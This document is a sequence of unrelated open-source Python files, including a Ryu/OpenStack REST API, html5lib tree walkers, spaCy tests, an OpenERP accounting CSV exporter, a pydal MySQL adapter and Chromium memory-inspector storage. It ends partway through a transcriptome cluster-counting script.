- Interface (uuid in ovsdb) registration
- Maintain interface association to a network
Used by OpenStack Ryu plug-in.
"""
import json
from webob import Response
from ryu.base import app_manager
from ryu.app.wsgi import (ControllerBase,
WSGIApplication)
from ryu.lib import quantum_ifaces
# REST API for openstack quantum
# get the list of iface-ids
# GET /v1.0/quantum/ports/
#
# register the iface_id
# POST /v1.0/quantum/ports/{iface_id}
#
# unregister iface_id
# DELETE /v1.0/quantum/ports/{iface_id}
#
# associate network_id with iface_id
# GET /v1.0/quantum/ports/{iface_id}/network_id
#
# associate network_id with iface_id
# POST /v1.0/quantum/ports/{iface_id}/network_id/{network_id}
#
# update network_id with iface_id
# PUT /v1.0/quantum/ports/{iface_id}/network_id/{network_id}
class QuantumController(ControllerBase):
def __init__(self, req, link, data, **config):
super(QuantumController, self).__init__(req, link, data, **config)
self.ifaces = data
def list_ifaces(self, _req, **_kwargs):
body = json.dumps(self.ifaces.keys())
return Response(content_type='application/json', body=body)
def delete_iface(self, _req, iface_id, **_kwargs):
self.ifaces.unregister(iface_id)
return Response(status=200)
def list_keys(self, _req, iface_id, **_kwargs):
try:
keys = self.ifaces.list_keys(iface_id)
except KeyError:
return Response(status=404)
body = json.dumps(keys)
return Response(content_type='application/json', body=body)
def get_key(self, _req, iface_id, key, **_kwargs):
try:
value = self.ifaces.get_key(iface_id, key)
except KeyError:
return Response(status=404)
body = json.dumps(value)
return Response(content_type='application/json', body=body)
def create_value(self, _req, iface_id, key, value, **_kwargs):
try:
self.ifaces.set_key(iface_id, key, value)
except ValueError:
return Response(status=404)
return Response(status=200)
def update_value(self, _req, iface_id, key, value, **_kwargs):
try:
self.ifaces.update_key(iface_id, key, value)
except ValueError:
return Response(status=404)
return Response(status=200)
class QuantumIfaceAPI(app_manager.RyuApp):
_CONTEXTS = {
'quantum_ifaces': quantum_ifaces.QuantumIfaces,
'wsgi': WSGIApplication,
}
def __init__(self, *args, **kwargs):
super(QuantumIfaceAPI, self).__init__(*args, **kwargs)
self.ifaces = kwargs['quantum_ifaces']
wsgi = kwargs['wsgi']
mapper = wsgi.mapper
controller = QuantumController
wsgi.registory[controller.__name__] = self.ifaces
route_name = 'quantum_ifaces'
uri = '/v1.0/quantum'
ports_uri = uri + '/ports'
s = mapper.submapper(controller=controller)
s.connect(route_name, ports_uri, action='list_ifaces',
conditions=dict(method=['GET', 'HEAD']))
iface_uri = ports_uri + '/{iface_id}'
s.connect(route_name, iface_uri, action='delete_iface',
conditions=dict(method=['DELETE']))
keys_uri = iface_uri + '/keys'
s.connect(route_name, keys_uri, action='list_keys',
conditions=dict(method=['GET', 'HEAD']))
key_uri = keys_uri + '/{key}'
s.connect(route_name, key_uri, action='get_key',
conditions=dict(method=['GET', 'HEAD']))
value_uri = keys_uri + '/{key}/{value}'
s.connect(route_name, value_uri, action='create_value',
conditions=dict(method=['POST']))
s.connect(route_name, value_uri, action='update_value',
conditions=dict(method=['PUT']))
| apache-2.0 |
buskjan/inetradio | lib/python3.5/site-packages/pip/_vendor/html5lib/treewalkers/__init__.py | 354 | 5544 | """A collection of modules for iterating through different kinds of
tree, generating tokens identical to those produced by the tokenizer
module.
To create a tree walker for a new type of tree, you need to do
implement a tree walker object (called TreeWalker by convention) that
implements a 'serialize' method taking a tree as sole argument and
returning an iterator generating tokens.
"""
from __future__ import absolute_import, division, unicode_literals
from .. import constants
from .._utils import default_etree
__all__ = ["getTreeWalker", "pprint", "dom", "etree", "genshi", "etree_lxml"]
treeWalkerCache = {}
def getTreeWalker(treeType, implementation=None, **kwargs):
"""Get a TreeWalker class for various types of tree with built-in support
Args:
treeType (str): the name of the tree type required (case-insensitive).
Supported values are:
- "dom": The xml.dom.minidom DOM implementation
- "etree": A generic walker for tree implementations exposing an
elementtree-like interface (known to work with
ElementTree, cElementTree and lxml.etree).
- "lxml": Optimized walker for lxml.etree
- "genshi": a Genshi stream
Implementation: A module implementing the tree type e.g.
xml.etree.ElementTree or cElementTree (Currently applies to the
"etree" tree type only).
"""
treeType = treeType.lower()
if treeType not in treeWalkerCache:
if treeType == "dom":
from . import dom
treeWalkerCache[treeType] = dom.TreeWalker
elif treeType == "genshi":
from . import genshi
treeWalkerCache[treeType] = genshi.TreeWalker
elif treeType == "lxml":
from . import etree_lxml
treeWalkerCache[treeType] = etree_lxml.TreeWalker
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# XXX: NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeWalker
return treeWalkerCache.get(treeType)
def concatenateCharacterTokens(tokens):
pendingCharacters = []
for token in tokens:
type = token["type"]
if type in ("Characters", "SpaceCharacters"):
pendingCharacters.append(token["data"])
else:
if pendingCharacters:
yield {"type": "Characters", "data": "".join(pendingCharacters)}
pendingCharacters = []
yield token
if pendingCharacters:
yield {"type": "Characters", "data": "".join(pendingCharacters)}
def pprint(walker):
"""Pretty printer for tree walkers"""
output = []
indent = 0
for token in concatenateCharacterTokens(walker):
type = token["type"]
if type in ("StartTag", "EmptyTag"):
# tag name
if token["namespace"] and token["namespace"] != constants.namespaces["html"]:
if token["namespace"] in constants.prefixes:
ns = constants.prefixes[token["namespace"]]
else:
ns = token["namespace"]
name = "%s %s" % (ns, token["name"])
else:
name = token["name"]
output.append("%s<%s>" % (" " * indent, name))
indent += 2
# attributes (sorted for consistent ordering)
attrs = token["data"]
for (namespace, localname), value in sorted(attrs.items()):
if namespace:
if namespace in constants.prefixes:
ns = constants.prefixes[namespace]
else:
ns = namespace
name = "%s %s" % (ns, localname)
else:
name = localname
output.append("%s%s=\"%s\"" % (" " * indent, name, value))
# self-closing
if type == "EmptyTag":
indent -= 2
elif type == "EndTag":
indent -= 2
elif type == "Comment":
output.append("%s<!-- %s -->" % (" " * indent, token["data"]))
elif type == "Doctype":
if token["name"]:
if token["publicId"]:
output.append("""%s<!DOCTYPE %s "%s" "%s">""" %
(" " * indent,
token["name"],
token["publicId"],
token["systemId"] if token["systemId"] else ""))
elif token["systemId"]:
output.append("""%s<!DOCTYPE %s "" "%s">""" %
(" " * indent,
token["name"],
token["systemId"]))
else:
output.append("%s<!DOCTYPE %s>" % (" " * indent,
token["name"]))
else:
output.append("%s<!DOCTYPE >" % (" " * indent,))
elif type == "Characters":
output.append("%s\"%s\"" % (" " * indent, token["data"]))
elif type == "SpaceCharacters":
assert False, "concatenateCharacterTokens should have got rid of all Space tokens"
else:
raise ValueError("Unknown token type, %s" % type)
return "\n".join(output)
| gpl-3.0 |
aikramer2/spaCy | spacy/tests/test_underscore.py | 2 | 3265 | # coding: utf-8
from __future__ import unicode_literals
import pytest
from mock import Mock
from ..vocab import Vocab
from ..tokens import Doc, Span, Token
from ..tokens.underscore import Underscore
def test_create_doc_underscore():
doc = Mock()
doc.doc = doc
uscore = Underscore(Underscore.doc_extensions, doc)
assert uscore._doc is doc
assert uscore._start is None
assert uscore._end is None
def test_doc_underscore_getattr_setattr():
doc = Mock()
doc.doc = doc
doc.user_data = {}
Underscore.doc_extensions['hello'] = (False, None, None, None)
doc._ = Underscore(Underscore.doc_extensions, doc)
assert doc._.hello == False
doc._.hello = True
assert doc._.hello == True
def test_create_span_underscore():
span = Mock(doc=Mock(), start=0, end=2)
uscore = Underscore(Underscore.span_extensions, span,
start=span.start, end=span.end)
assert uscore._doc is span.doc
assert uscore._start is span.start
assert uscore._end is span.end
def test_span_underscore_getter_setter():
span = Mock(doc=Mock(), start=0, end=2)
Underscore.span_extensions['hello'] = (None, None,
lambda s: (s.start, 'hi'),
lambda s, value: setattr(s, 'start',
value))
span._ = Underscore(Underscore.span_extensions, span,
start=span.start, end=span.end)
assert span._.hello == (0, 'hi')
span._.hello = 1
assert span._.hello == (1, 'hi')
def test_token_underscore_method():
token = Mock(doc=Mock(), idx=7, say_cheese=lambda token: 'cheese')
Underscore.token_extensions['hello'] = (None, token.say_cheese,
None, None)
token._ = Underscore(Underscore.token_extensions, token, start=token.idx)
assert token._.hello() == 'cheese'
@pytest.mark.parametrize('obj', [Doc, Span, Token])
def test_doc_underscore_remove_extension(obj):
ext_name = 'to_be_removed'
obj.set_extension(ext_name, default=False)
assert obj.has_extension(ext_name)
obj.remove_extension(ext_name)
assert not obj.has_extension(ext_name)
@pytest.mark.parametrize('obj', [Doc, Span, Token])
def test_underscore_raises_for_dup(obj):
obj.set_extension('test', default=None)
with pytest.raises(ValueError):
obj.set_extension('test', default=None)
@pytest.mark.parametrize('invalid_kwargs', [
{'getter': None, 'setter': lambda: None},
{'default': None, 'method': lambda: None, 'getter': lambda: None},
{'setter': lambda: None},
{'default': None, 'method': lambda: None},
{'getter': True}])
def test_underscore_raises_for_invalid(invalid_kwargs):
invalid_kwargs['force'] = True
with pytest.raises(ValueError):
Doc.set_extension('test', **invalid_kwargs)
@pytest.mark.parametrize('valid_kwargs', [
{'getter': lambda: None},
{'getter': lambda: None, 'setter': lambda: None},
{'default': 'hello'},
{'default': None},
{'method': lambda: None}])
def test_underscore_accepts_valid(valid_kwargs):
valid_kwargs['force'] = True
Doc.set_extension('test', **valid_kwargs)
| mit |
BT-csanchez/account-financial-reporting | account_export_csv/wizard/account_export_csv.py | 29 | 16458 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author Joel Grand-Guillaume and Vincent Renaville Copyright 2013
# Camptocamp SA
# CSV data formating inspired from
# http://docs.python.org/2.7/library/csv.html?highlight=csv#examples
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import itertools
import tempfile
from cStringIO import StringIO
import base64
import csv
import codecs
from openerp.osv import orm, fields
from openerp.tools.translate import _
class AccountUnicodeWriter(object):
"""
A CSV writer which will write rows to CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
# Redirect output to a queue
self.queue = StringIO()
# created a writer with Excel formating settings
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
# we ensure that we do not try to encode none or bool
row = (x or u'' for x in row)
encoded_row = [
c.encode("utf-8") if isinstance(c, unicode) else c for c in row]
self.writer.writerow(encoded_row)
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for row in rows:
self.writerow(row)
class AccountCSVExport(orm.TransientModel):
_name = 'account.csv.export'
_description = 'Export Accounting'
_columns = {
'data': fields.binary('CSV', readonly=True),
'company_id': fields.many2one('res.company', 'Company',
invisible=True),
'fiscalyear_id': fields.many2one('account.fiscalyear', 'Fiscalyear',
required=True),
'periods': fields.many2many(
'account.period', 'rel_wizard_period',
'wizard_id', 'period_id', 'Periods',
help='All periods in the fiscal year if empty'),
'journal_ids': fields.many2many(
'account.journal',
'rel_wizard_journal',
'wizard_id',
'journal_id',
'Journals',
help='If empty, use all journals, only used for journal entries'),
'export_filename': fields.char('Export CSV Filename', size=128),
}
def _get_company_default(self, cr, uid, context=None):
comp_obj = self.pool['res.company']
return comp_obj._company_default_get(cr, uid, 'account.fiscalyear',
context=context)
def _get_fiscalyear_default(self, cr, uid, context=None):
fiscalyear_obj = self.pool['account.fiscalyear']
context = dict(context,
company_id=self._get_company_default(cr, uid, context))
return fiscalyear_obj.find(cr, uid, dt=None, exception=True,
context=context)
_defaults = {'company_id': _get_company_default,
'fiscalyear_id': _get_fiscalyear_default,
'export_filename': 'account_export.csv'}
def action_manual_export_account(self, cr, uid, ids, context=None):
this = self.browse(cr, uid, ids)[0]
rows = self.get_data(cr, uid, ids, "account", context)
file_data = StringIO()
try:
writer = AccountUnicodeWriter(file_data)
writer.writerows(rows)
file_value = file_data.getvalue()
self.write(cr, uid, ids,
{'data': base64.encodestring(file_value)},
context=context)
finally:
file_data.close()
return {
'type': 'ir.actions.act_window',
'res_model': 'account.csv.export',
'view_mode': 'form',
'view_type': 'form',
'res_id': this.id,
'views': [(False, 'form')],
'target': 'new',
}
def _get_header_account(self, cr, uid, ids, context=None):
return [_(u'CODE'),
_(u'NAME'),
_(u'DEBIT'),
_(u'CREDIT'),
_(u'BALANCE'),
]
def _get_rows_account(self, cr, uid, ids,
fiscalyear_id,
period_range_ids,
journal_ids,
context=None):
"""
Return list to generate rows of the CSV file
"""
cr.execute("""
select ac.code,ac.name,
sum(debit) as sum_debit,
sum(credit) as sum_credit,
sum(debit) - sum(credit) as balance
from account_move_line as aml,account_account as ac
where aml.account_id = ac.id
and period_id in %(period_ids)s
group by ac.id,ac.code,ac.name
order by ac.code
""",
{'fiscalyear_id': fiscalyear_id,
'period_ids': tuple(period_range_ids)}
)
res = cr.fetchall()
rows = []
for line in res:
rows.append(list(line))
return rows
def action_manual_export_analytic(self, cr, uid, ids, context=None):
this = self.browse(cr, uid, ids)[0]
rows = self.get_data(cr, uid, ids, "analytic", context)
file_data = StringIO()
try:
writer = AccountUnicodeWriter(file_data)
writer.writerows(rows)
file_value = file_data.getvalue()
self.write(cr, uid, ids,
{'data': base64.encodestring(file_value)},
context=context)
finally:
file_data.close()
return {
'type': 'ir.actions.act_window',
'res_model': 'account.csv.export',
'view_mode': 'form',
'view_type': 'form',
'res_id': this.id,
'views': [(False, 'form')],
'target': 'new',
}
def _get_header_analytic(self, cr, uid, ids, context=None):
return [_(u'ANALYTIC CODE'),
_(u'ANALYTIC NAME'),
_(u'CODE'),
_(u'ACCOUNT NAME'),
_(u'DEBIT'),
_(u'CREDIT'),
_(u'BALANCE'),
]
def _get_rows_analytic(self, cr, uid, ids,
fiscalyear_id,
period_range_ids,
journal_ids,
context=None):
"""
Return list to generate rows of the CSV file
"""
cr.execute(""" select aac.code as analytic_code,
aac.name as analytic_name,
ac.code,ac.name,
sum(debit) as sum_debit,
sum(credit) as sum_credit,
sum(debit) - sum(credit) as balance
from account_move_line
left outer join account_analytic_account as aac
on (account_move_line.analytic_account_id = aac.id)
inner join account_account as ac
on account_move_line.account_id = ac.id
and account_move_line.period_id in %(period_ids)s
group by aac.id,aac.code,aac.name,ac.id,ac.code,ac.name
order by aac.code
""",
{'fiscalyear_id': fiscalyear_id,
'period_ids': tuple(period_range_ids)}
)
res = cr.fetchall()
rows = []
for line in res:
rows.append(list(line))
return rows
def action_manual_export_journal_entries(self, cr, uid, ids, context=None):
"""
Here we use TemporaryFile to avoid full filling the OpenERP worker
Memory
We also write the data to the wizard with SQL query as write seems
to use too much memory as well.
Those improvements permitted to improve the export from a 100k line to
200k lines
with default `limit_memory_hard = 805306368` (768MB) with more lines,
you might encounter a MemoryError when trying to download the file even
if it has been generated.
To be able to export bigger volume of data, it is advised to set
limit_memory_hard to 2097152000 (2 GB) to generate the file and let
OpenERP load it in the wizard when trying to download it.
Tested with up to a generation of 700k entry lines
"""
this = self.browse(cr, uid, ids)[0]
rows = self.get_data(cr, uid, ids, "journal_entries", context)
with tempfile.TemporaryFile() as file_data:
writer = AccountUnicodeWriter(file_data)
writer.writerows(rows)
with tempfile.TemporaryFile() as base64_data:
file_data.seek(0)
base64.encode(file_data, base64_data)
base64_data.seek(0)
cr.execute("""
UPDATE account_csv_export
SET data = %s
WHERE id = %s""", (base64_data.read(), ids[0]))
return {
'type': 'ir.actions.act_window',
'res_model': 'account.csv.export',
'view_mode': 'form',
'view_type': 'form',
'res_id': this.id,
'views': [(False, 'form')],
'target': 'new',
}
def _get_header_journal_entries(self, cr, uid, ids, context=None):
return [
# Standard Sage export fields
_(u'DATE'),
_(u'JOURNAL CODE'),
_(u'ACCOUNT CODE'),
_(u'PARTNER NAME'),
_(u'REF'),
_(u'DESCRIPTION'),
_(u'DEBIT'),
_(u'CREDIT'),
_(u'FULL RECONCILE'),
_(u'PARTIAL RECONCILE'),
_(u'ANALYTIC ACCOUNT CODE'),
# Other fields
_(u'ENTRY NUMBER'),
_(u'ACCOUNT NAME'),
_(u'BALANCE'),
_(u'AMOUNT CURRENCY'),
_(u'CURRENCY'),
_(u'ANALYTIC ACCOUNT NAME'),
_(u'JOURNAL'),
_(u'MONTH'),
_(u'FISCAL YEAR'),
_(u'TAX CODE CODE'),
_(u'TAX CODE NAME'),
_(u'TAX AMOUNT'),
_(u'BANK STATEMENT'),
]
def _get_rows_journal_entries(self, cr, uid, ids,
fiscalyear_id,
period_range_ids,
journal_ids,
context=None):
"""
Create a generator of rows of the CSV file
"""
cr.execute("""
SELECT
account_move_line.date AS date,
account_journal.name as journal,
account_account.code AS account_code,
res_partner.name AS partner_name,
account_move_line.ref AS ref,
account_move_line.name AS description,
account_move_line.debit AS debit,
account_move_line.credit AS credit,
account_move_reconcile.name as full_reconcile,
account_move_line.reconcile_partial_id AS partial_reconcile_id,
account_analytic_account.code AS analytic_account_code,
account_move.name AS entry_number,
account_account.name AS account_name,
account_move_line.debit - account_move_line.credit AS balance,
account_move_line.amount_currency AS amount_currency,
res_currency.name AS currency,
account_analytic_account.name AS analytic_account_name,
account_journal.name as journal,
account_period.code AS month,
account_fiscalyear.name as fiscal_year,
account_tax_code.code AS aml_tax_code_code,
account_tax_code.name AS aml_tax_code_name,
account_move_line.tax_amount AS aml_tax_amount,
account_bank_statement.name AS bank_statement
FROM
public.account_move_line
JOIN account_account on
(account_account.id=account_move_line.account_id)
JOIN account_period on
(account_period.id=account_move_line.period_id)
JOIN account_fiscalyear on
(account_fiscalyear.id=account_period.fiscalyear_id)
JOIN account_journal on
(account_journal.id = account_move_line.journal_id)
LEFT JOIN res_currency on
(res_currency.id=account_move_line.currency_id)
LEFT JOIN account_move_reconcile on
(account_move_reconcile.id = account_move_line.reconcile_id)
LEFT JOIN res_partner on
(res_partner.id=account_move_line.partner_id)
LEFT JOIN account_move on
(account_move.id=account_move_line.move_id)
LEFT JOIN account_tax on
(account_tax.id=account_move_line.account_tax_id)
LEFT JOIN account_tax_code on
(account_tax_code.id=account_move_line.tax_code_id)
LEFT JOIN account_analytic_account on
(account_analytic_account.id=account_move_line.analytic_account_id)
LEFT JOIN account_bank_statement on
(account_bank_statement.id=account_move_line.statement_id)
WHERE account_period.id IN %(period_ids)s
AND account_journal.id IN %(journal_ids)s
ORDER BY account_move_line.date
""",
{'period_ids': tuple(
period_range_ids), 'journal_ids': tuple(journal_ids)}
)
while 1:
# http://initd.org/psycopg/docs/cursor.html#cursor.fetchmany
# Set cursor.arraysize to minimize network round trips
cr.arraysize = 100
rows = cr.fetchmany()
if not rows:
break
for row in rows:
yield row
def get_data(self, cr, uid, ids, result_type, context=None):
get_header_func = getattr(
self, ("_get_header_%s" % (result_type)), None)
get_rows_func = getattr(self, ("_get_rows_%s" % (result_type)), None)
form = self.browse(cr, uid, ids[0], context=context)
fiscalyear_id = form.fiscalyear_id.id
if form.periods:
period_range_ids = [x.id for x in form.periods]
else:
# If not period selected , we take all periods
p_obj = self.pool.get("account.period")
period_range_ids = p_obj.search(
cr, uid, [('fiscalyear_id', '=', fiscalyear_id)],
context=context)
journal_ids = None
if form.journal_ids:
journal_ids = [x.id for x in form.journal_ids]
else:
j_obj = self.pool.get("account.journal")
journal_ids = j_obj.search(cr, uid, [], context=context)
rows = itertools.chain((get_header_func(cr, uid, ids,
context=context),),
get_rows_func(cr, uid, ids,
fiscalyear_id,
period_range_ids,
journal_ids,
context=context)
)
return rows
| agpl-3.0 |
ybenitezf/miner | core/pydal/adapters/mysql.py | 11 | 5041 | # -*- coding: utf-8 -*-
import re
from .._globals import IDENTITY
from ..helpers.methods import varquote_aux
from .base import BaseAdapter
class MySQLAdapter(BaseAdapter):
drivers = ('MySQLdb','pymysql', 'mysqlconnector')
commit_on_alter_table = True
support_distributed_transaction = True
types = {
'boolean': 'CHAR(1)',
'string': 'VARCHAR(%(length)s)',
'text': 'LONGTEXT',
'json': 'LONGTEXT',
'password': 'VARCHAR(%(length)s)',
'blob': 'LONGBLOB',
'upload': 'VARCHAR(%(length)s)',
'integer': 'INT',
'bigint': 'BIGINT',
'float': 'FLOAT',
'double': 'DOUBLE',
'decimal': 'NUMERIC(%(precision)s,%(scale)s)',
'date': 'DATE',
'time': 'TIME',
'datetime': 'DATETIME',
'id': 'INT AUTO_INCREMENT NOT NULL',
'reference': 'INT %(null)s %(unique)s, INDEX %(index_name)s (%(field_name)s), FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s',
'list:integer': 'LONGTEXT',
'list:string': 'LONGTEXT',
'list:reference': 'LONGTEXT',
'big-id': 'BIGINT AUTO_INCREMENT NOT NULL',
'big-reference': 'BIGINT %(null)s %(unique)s, INDEX %(index_name)s (%(field_name)s), FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s',
'reference FK': ', CONSTRAINT `FK_%(constraint_name)s` FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s',
}
QUOTE_TEMPLATE = "`%s`"
def varquote(self,name):
return varquote_aux(name,'`%s`')
def RANDOM(self):
return 'RAND()'
def SUBSTRING(self,field,parameters):
return 'SUBSTRING(%s,%s,%s)' % (self.expand(field),
parameters[0], parameters[1])
def EPOCH(self, first):
return "UNIX_TIMESTAMP(%s)" % self.expand(first)
def CONCAT(self, *items):
return 'CONCAT(%s)' % ','.join(self.expand(x,'string') for x in items)
def REGEXP(self,first,second):
return '(%s REGEXP %s)' % (self.expand(first),
self.expand(second,'string'))
def CAST(self, first, second):
if second=='LONGTEXT': second = 'CHAR'
return 'CAST(%s AS %s)' % (first, second)
def _drop(self,table,mode):
# breaks db integrity but without this mysql does not drop table
table_rname = table.sqlsafe
return ['SET FOREIGN_KEY_CHECKS=0;','DROP TABLE %s;' % table_rname,
'SET FOREIGN_KEY_CHECKS=1;']
def _insert_empty(self, table):
return 'INSERT INTO %s VALUES (DEFAULT);' % (table.sqlsafe)
def distributed_transaction_begin(self,key):
self.execute('XA START;')
def prepare(self,key):
self.execute("XA END;")
self.execute("XA PREPARE;")
def commit_prepared(self,key):
self.execute("XA COMMIT;")
def rollback_prepared(self,key):
self.execute("XA ROLLBACK;")
REGEX_URI = re.compile('^(?P<user>[^:@]+)(\:(?P<password>[^@]*))?@(?P<host>\[[^/]+\]|[^\:/]+)(\:(?P<port>[0-9]+))?/(?P<db>[^?]+)(\?set_encoding=(?P<charset>\w+))?$')
def __init__(self,db,uri,pool_size=0,folder=None,db_codec ='UTF-8',
credential_decoder=IDENTITY, driver_args={},
adapter_args={}, do_connect=True, after_connection=None):
self.db = db
self.dbengine = "mysql"
self.uri = uri
if do_connect: self.find_driver(adapter_args,uri)
self.pool_size = pool_size
self.folder = folder
self.db_codec = db_codec
self._after_connection = after_connection
self.find_or_make_work_folder()
ruri = uri.split('://',1)[1]
m = self.REGEX_URI.match(ruri)
if not m:
raise SyntaxError(
"Invalid URI string in DAL: %s" % self.uri)
user = credential_decoder(m.group('user'))
if not user:
raise SyntaxError('User required')
password = credential_decoder(m.group('password'))
if not password:
password = ''
host = m.group('host')
if not host:
raise SyntaxError('Host name required')
db = m.group('db')
if not db:
raise SyntaxError('Database name required')
port = int(m.group('port') or '3306')
charset = m.group('charset') or 'utf8'
driver_args.update(db=db,
user=credential_decoder(user),
passwd=credential_decoder(password),
host=host,
port=port,
charset=charset)
def connector(driver_args=driver_args):
return self.driver.connect(**driver_args)
self.connector = connector
if do_connect: self.reconnect()
def after_connection(self):
self.execute('SET FOREIGN_KEY_CHECKS=1;')
self.execute("SET sql_mode='NO_BACKSLASH_ESCAPES';")
| gpl-2.0 |
ondra-novak/chromium.src | tools/memory_inspector/memory_inspector/data/file_storage.py | 54 | 6131 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module handles file-backed storage of the core classes.
The storage is logically organized as follows:
Storage -> N Archives -> 1 Symbol index
N Snapshots -> 1 Mmaps dump.
-> 0/1 Native heap dump.
Where an "archive" is essentially a collection of snapshots taken for a given
app at a given point in time.
"""
import datetime
import json
import os
from memory_inspector.core import memory_map
from memory_inspector.core import native_heap
from memory_inspector.core import symbol
from memory_inspector.data import serialization
class Storage(object):
_SETTINGS_FILE = 'settings-%s.json'
def __init__(self, root_path):
"""Creates a file-backed storage. Files will be placed in |root_path|."""
self._root = root_path
if not os.path.exists(self._root):
os.makedirs(self._root)
def LoadSettings(self, name):
"""Loads a key-value dict from the /settings-name.json file.
This is for backend and device settings (e.g., symbols path, adb path)."""
file_path = os.path.join(self._root, Storage._SETTINGS_FILE % name)
if not os.path.exists(file_path):
return {}
with open(file_path) as f:
return json.load(f)
def StoreSettings(self, name, settings):
"""Stores a key-value dict into /settings-name.json file."""
assert(isinstance(settings, dict))
file_path = os.path.join(self._root, Storage._SETTINGS_FILE % name)
if not settings:
if os.path.exists(file_path):
os.unlink(file_path)
return
with open(file_path, 'w') as f:
return json.dump(settings, f)
def ListArchives(self):
"""Lists archives. Each of them is a sub-folder inside the |root_path|."""
return sorted(
[name for name in os.listdir(self._root)
if os.path.isdir(os.path.join(self._root, name))])
def OpenArchive(self, archive_name, create=False):
"""Returns an instance of |Archive|."""
archive_path = os.path.join(self._root, archive_name)
if not os.path.exists(archive_path) and create:
os.makedirs(archive_path)
return Archive(archive_name, archive_path)
def DeleteArchive(self, archive_name):
"""Deletes the archive (removing its folder)."""
archive_path = os.path.join(self._root, archive_name)
for f in os.listdir(archive_path):
os.unlink(os.path.join(archive_path, f))
os.rmdir(archive_path)
class Archive(object):
"""A collection of snapshots, each one holding one memory dump (per kind)."""
_MMAP_EXT = '-mmap.json'
_NHEAP_EXT = '-nheap.json'
_SNAP_EXT = '.snapshot'
_SYM_FILE = 'syms.json'
_TIME_FMT = '%Y-%m-%d_%H-%M-%S-%f'
def __init__(self, name, path):
assert(os.path.isdir(path))
self._name = name
self._path = path
self._cur_snapshot = None
def StoreSymbols(self, symbols):
"""Stores the symbol db (one per the overall archive)."""
assert(isinstance(symbols, symbol.Symbols))
file_path = os.path.join(self._path, Archive._SYM_FILE)
with open(file_path, 'w') as f:
json.dump(symbols, f, cls=serialization.Encoder)
def HasSymbols(self):
return os.path.exists(os.path.join(self._path, Archive._SYM_FILE))
def LoadSymbols(self):
assert(self.HasSymbols())
file_path = os.path.join(self._path, Archive._SYM_FILE)
with open(file_path) as f:
return json.load(f, cls=serialization.SymbolsDecoder)
def StartNewSnapshot(self):
"""Creates a 2014-01-01_02:03:04.snapshot marker (an empty file)."""
self._cur_snapshot = Archive._TimestampToStr(datetime.datetime.now())
file_path = os.path.join(self._path,
self._cur_snapshot + Archive._SNAP_EXT)
assert(not os.path.exists(file_path))
open(file_path, 'w').close()
return datetime.datetime.strptime(self._cur_snapshot, Archive._TIME_FMT)
def ListSnapshots(self):
"""Returns a list of timestamps (datetime.datetime instances)."""
file_names = sorted(
[name[:-(len(Archive._SNAP_EXT))] for name in os.listdir(self._path)
if name.endswith(Archive._SNAP_EXT)])
timestamps = [datetime.datetime.strptime(x, Archive._TIME_FMT)
for x in file_names]
return timestamps
def StoreMemMaps(self, mmaps):
assert(isinstance(mmaps, memory_map.Map))
assert(self._cur_snapshot), 'Must call StartNewSnapshot first'
file_path = os.path.join(self._path, self._cur_snapshot + Archive._MMAP_EXT)
with open(file_path, 'w') as f:
json.dump(mmaps, f, cls=serialization.Encoder)
def HasMemMaps(self, timestamp):
return self._HasSnapshotFile(timestamp, Archive._MMAP_EXT)
def LoadMemMaps(self, timestamp):
assert(self.HasMemMaps(timestamp))
snapshot_name = Archive._TimestampToStr(timestamp)
file_path = os.path.join(self._path, snapshot_name + Archive._MMAP_EXT)
with open(file_path) as f:
return json.load(f, cls=serialization.MmapDecoder)
def StoreNativeHeap(self, nheap):
assert(isinstance(nheap, native_heap.NativeHeap))
assert(self._cur_snapshot), 'Must call StartNewSnapshot first'
file_path = os.path.join(self._path,
self._cur_snapshot + Archive._NHEAP_EXT)
with open(file_path, 'w') as f:
json.dump(nheap, f, cls=serialization.Encoder)
def HasNativeHeap(self, timestamp):
return self._HasSnapshotFile(timestamp, Archive._NHEAP_EXT)
def LoadNativeHeap(self, timestamp):
assert(self.HasNativeHeap(timestamp))
snapshot_name = Archive._TimestampToStr(timestamp)
file_path = os.path.join(self._path, snapshot_name + Archive._NHEAP_EXT)
with open(file_path) as f:
return json.load(f, cls=serialization.NativeHeapDecoder)
def _HasSnapshotFile(self, timestamp, ext):
name = Archive._TimestampToStr(timestamp)
return os.path.exists(os.path.join(self._path, name + ext))
@staticmethod
def _TimestampToStr(timestamp):
return timestamp.strftime(Archive._TIME_FMT) | bsd-3-clause |
Adamtaranto/Corset-tools | crossClustCount.py | 1 | 6705 | #!/usr/bin/env python
#python 2.7.5 requires biopython
#crossClustCount.py
#Version 1. Adam Taranto, April 2015
#Contact, Adam Taranto, adam.taranto@anu.edu.au
#Take two transcriptomes and a Corset cluster map.
#Determine number of member transcripts in each cluster that belong to each of the input transcriptomes.
import os
import csv
import sys
import argparse
from Bio import SeqIO
from Bio.Seq import Seq
from os.path import basename
def main(transFastaX=None, transFastaY=None, transNameX=None, transNameY=None, clustMap=None, outFile='CountClusterMembers.txt'):
#If main is imported to python term as function, check that required inputs are provided
if transFastaX is None:
sys.exit('Missing transcriptome fasta X')
if transFastaY is None:
sys.exit('Missing transcriptome fasta Y')
if clustMap is None:
